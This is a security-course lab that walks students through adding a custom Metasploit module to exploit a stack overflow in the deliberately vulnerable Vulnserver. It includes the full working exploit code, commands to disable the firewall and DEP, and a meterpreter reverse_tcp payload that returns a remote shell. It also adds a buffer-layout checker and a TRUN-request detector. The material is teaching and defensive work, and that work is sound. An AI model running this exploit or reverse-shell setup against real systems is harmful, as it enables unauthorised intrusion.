H 311: Adding a Custom Exploit to Metasploit (15 pts)

What you need

Purpose

To practice adding custom modules to Metasploit.

Task 1: Preparing the Windows Target

Turning Off Windows Firewall

At the lower left of the Windows desktop, click the magnifying glass icon.

Type FIREWALL.

In the Search results, click "Windows Firewall", the second result in the image below.

In the Windows Firewall box, on the left side, click "Turn Windows Firewall on or off".

Check both of the boxes labelled "Turn off Windows Firewall (not recommended)", as shown below.

Click OK.

Turning Off DEP

On your Windows machine, click Start and type "Control Panel".

In Control Panel, click "System and Security". Click System.

In the System box, click "Advanced System Settings".

In System Properties, on the Advanced tab, in the Performance section, click the Settings button.

In the Performance Options box, on the "Data Execution Prevention" tab, click "Turn on DEP for essential Windows programs and services only", as shown below.

Click OK. Click OK again. Click OK again.

Restart your server.

Preparing the Vulnerable Server

On your Windows machine, in Internet Explorer, open this page:

http://getfirefox.com

Install Firefox.

In Firefox, go to

http://sites.google.com/site/lupingreycorner/vulnserver.zip

If that link doesn't work, try this alternative download link.

Save the "vulnserver.zip" file in your Downloads folder.

Click Start, "File Explorer". Navigate to your Downloads folder.

In your Downloads folder, right-click vulnserver.

Click "Extract All...", Extract.

A "vulnserver" window opens. Double-click vulnserver.

In the "Open File - Security Warning" box, click OK.

The Vulnserver application opens, as shown below.


Task 2: Preparing the Debian Server

You should already have Metasploit and Nmap installed, as detailed in the previous project.

Testing the Target Server

On your Kali Linux machine, in the Terminal window, execute this command, as shown below, replacing the IP address with the IP address of your Windows Server 2016 machine.
sudo nmap -sV -p9999 192.168.100.3
You should see the port open, as shown below.


Task 3: Exploiting the Windows Target

Searching for a Metasploit Exploit

On your Debian server, execute this command:
sudo msfconsole -q
At the msf5 > prompt, execute this command:
search vulnserver
No exploits are found, as shown below.

Adding a Custom Exploit

On your Debian server, execute these commands:
sudo mkdir -p /root/.msf4/modules/exploits/windows/misc
sudo nano /root/.msf4/modules/exploits/windows/misc/vulnserver_bof.rb
Paste in this code:
# Metasploit template from corelan.be
# BoF for vulnserver, thegreycorner.com
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote # A remote exploit

  include Msf::Exploit::Remote::Tcp # using a TCP connection

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Vulnserver stack overflow',
      'Description' => %q{
        This module exploits a stack overflow in the TRUN command of
        vulnserver.
      },
      'Author'      => [ 'Stephen Bradshaw', 'Duncan Winfrey' ],
      'Version'     => '$Revision: 9999 $',
      'References'  =>
        [
          [ 'Vulnserver', 'http://www.thegreycorner.com/p/vulnserver.html' ],
          [ 'corelan.be', 'http://tinyurl.com/64s3je4' ],
        ],

      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload' =>
        {
          'Space'    => 500,             # largest encoded payload the module accepts
          'BadChars' => "\x00\x0A\x0D",  # bytes the encoder must keep out of the payload
        },
      'Platform' => 'win',

      'Targets' =>
        [
          # 'Ret' is the address written over the saved return address;
          # 'Offset' is the number of bytes of filler needed to reach it.
          [ 'Windows XP Universal',
            { 'Ret' => 0x625011af, 'Offset' => 2003 } ],
        ],
      'DefaultTarget' => 0,

      'Privileged' => false
    ))

    # The second argument (self.class) of the old template is deprecated
    # and only produces a warning in msf5, so it is dropped here.
    register_options(
      [
        Opt::RPORT(9999)  # vulnserver listens on TCP port 9999
      ])
  end

  def exploit
    connect

    # Layout: command prefix, filler up to the saved return address,
    # the return address in little-endian order, a 32-byte NOP pad,
    # then the encoded payload.
    junk   = make_nops(target['Offset'])
    sploit = 'TRUN /.:/' + junk + [target.ret].pack('V') + make_nops(32) + payload.encoded
    sock.put(sploit)

    handler
    disconnect
  end

end
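To see what the exploit method actually assembles, and to check a payload against the 'Space' and 'BadChars' metadata before the module is used, the following stand-alone Ruby script is added here as an example. It is not part of the lab or of the module above and does not need Metasploit: make_nops is replaced by a plain run of 0x90 bytes, the Offset, Ret, Space and BadChars values are copied from the module on this page, and the payload bytes are a constructed placeholder rather than a real payload.

```ruby
# Added example (not part of the lab or the Metasploit module): reproduces
# the buffer layout built by the module's exploit method and validates a
# payload against the module's Payload metadata.

OFFSET   = 2003                 # 'Offset' from the module's target entry
RET      = 0x625011af           # 'Ret' from the module's target entry
SPACE    = 500                  # 'Space' from the module's Payload hash
BADCHARS = "\x00\x0A\x0D".b     # 'BadChars' from the module's Payload hash

# Stand-in for Metasploit's make_nops: a run of single-byte NOPs (0x90).
def make_nops(count)
  "\x90".b * count
end

# Same layout as the module's exploit method: command prefix, filler up to
# the saved return address, the return address in little-endian byte order
# ([x].pack('V')), a 32-byte NOP pad, then the payload bytes.
def build_trun_buffer(payload, offset: OFFSET, ret: RET)
  'TRUN /.:/'.b + make_nops(offset) + [ret].pack('V') + make_nops(32) + payload.b
end

# Returns the reasons a payload would violate the module's Payload metadata;
# an empty list means the payload fits the Space and BadChars constraints.
def payload_problems(payload, space: SPACE, badchars: BADCHARS)
  problems = []
  problems << "too long: #{payload.bytesize} > #{space}" if payload.bytesize > space
  payload.each_byte.with_index do |b, i|
    if badchars.bytes.include?(b)
      problems << format('bad char 0x%02x at offset %d', b, i)
    end
  end
  problems
end

if __FILE__ == $PROGRAM_NAME
  fake_payload = "\xCC".b * 16  # constructed placeholder, not a real payload
  buf = build_trun_buffer(fake_payload)
  puts "buffer length: #{buf.bytesize} bytes"
  puts "return address bytes on the wire: #{buf.byteslice(9 + OFFSET, 4).unpack1('H*')}"
  puts "problems with placeholder payload: #{payload_problems(fake_payload).inspect}"
  puts "problems with a payload containing a NUL: #{payload_problems("A\x00B".b).inspect}"
end
```

Running the script shows why the module writes `[target.ret].pack('V')` rather than the address as text: 0x625011af goes onto the wire as the bytes af 11 50 62, least significant byte first. payload_problems is the check Metasploit's encoder performs for you when it honours 'Space' and 'BadChars'; doing it by hand makes the two values meaningful rather than magic.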

Finding the New Exploit

On your Debian server, execute this command:
sudo msfconsole -q
It asks if you want to set up a database. Reply no.

At the msf5 > prompt, execute this command:

search vulnserver
No exploits are found.

To load the new exploit, execute these commands:

reload_all
search vulnserver
Now the module is found, as shown below.

Selecting Options and Payload

At the msf5 > prompt, execute these commands:
use exploit/windows/misc/vulnserver_bof
show info
This exploit requires RHOSTS. We also need to select a payload. Any payload of 500 bytes or smaller is allowed (the 'Space' value set in the module), as shown below.

Execute these commands to select a payload and see what options it requires:

show payloads
set payload windows/meterpreter/reverse_tcp
show options
The payload requires LHOST, as shown below.

Execute these commands to perform the exploit, using the correct addresses for your Debian and Windows machines:

set RHOSTS 192.168.100.3
set LHOST 192.168.100.1
exploit
The options required for this exploit are listed. The required options are RHOSTS and LHOST.

You get a shell, as shown below.
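From the defender's side, the same module metadata tells you what this attack looks like on the wire: a TRUN command whose argument runs past the 2003-byte offset and carries raw machine code bytes. The following Ruby detector is an added example, not part of the lab; it classifies captured client-to-server command lines for vulnserver's port and flags suspicious TRUN requests. The sample lines are constructed, and the LONG_ARG_BYTES threshold is an assumption chosen to sit far above any legitimate command length.

```ruby
# Added example (not part of the lab): flags oversized or binary TRUN
# requests in captured vulnserver command lines.

TRUN_PREFIX    = '/.:/'  # the argument prefix used by the module on this page
TRUN_OFFSET    = 2003    # 'Offset' from the module: bytes of filler before the return address
LONG_ARG_BYTES = 1000    # assumed threshold; legitimate arguments are a few bytes

# Constructed sample of captured client lines (not real traffic).
SAMPLE_LINES = [
  "HELP\n",
  "TRUN hello\n",
  "STATS /.:/\n",
  "TRUN /.:/" + ("A" * 2050) + ("\x90".b * 32) + "\n",
]

# Splits a captured line into an upper-cased command and its raw argument bytes.
def parse_command(line)
  cmd, arg = line.chomp.split(' ', 2)
  [cmd.to_s.upcase, arg.to_s.b]
end

# Returns the reasons a TRUN line is suspicious; empty for benign lines
# and for every command other than TRUN.
def trun_reasons(line)
  cmd, arg = parse_command(line)
  return [] unless cmd == 'TRUN'

  reasons = []
  if arg.bytesize >= LONG_ARG_BYTES
    reasons << "argument is #{arg.bytesize} bytes, above #{LONG_ARG_BYTES}"
  end

  # The module counts its 2003-byte offset from just after 'TRUN /.:/'.
  body = arg.start_with?(TRUN_PREFIX) ? arg.byteslice(TRUN_PREFIX.bytesize, arg.bytesize) : arg
  if body.bytesize > TRUN_OFFSET
    reasons << "body of #{body.bytesize} bytes exceeds the #{TRUN_OFFSET}-byte offset to the saved return address"
  end
  if body.bytes.any? { |b| b < 0x20 || b > 0x7e }
    reasons << 'contains non-printable bytes'
  end
  reasons
end

# Maps the index of each flagged line to its reasons.
def scan(lines)
  lines.each_with_index.each_with_object({}) do |(line, i), flagged|
    r = trun_reasons(line)
    flagged[i] = r unless r.empty?
  end
end

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_LINES).each do |i, reasons|
    puts "line #{i}: #{reasons.join('; ')}"
  end
end
```

Only the last sample line is flagged, for all three reasons. The length rules are the robust ones: an attacker can avoid non-printable bytes by choosing an encoder, but cannot overwrite the saved return address without sending more than TRUN_OFFSET bytes after the prefix, so a length check on this one command is a cheap, low-noise signature for a server that never needs long arguments.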

H 311.1: Architecture (15 pts)

In the shell, execute this command:
ps vuln*
Find the Architecture name, which is covered by a green box in the image below. That's the flag.

Sources

Porting VulnServer TRUN /.:/ exploit to Metasploit

Posted 5-21-2020
Flag command fixed 8-1-20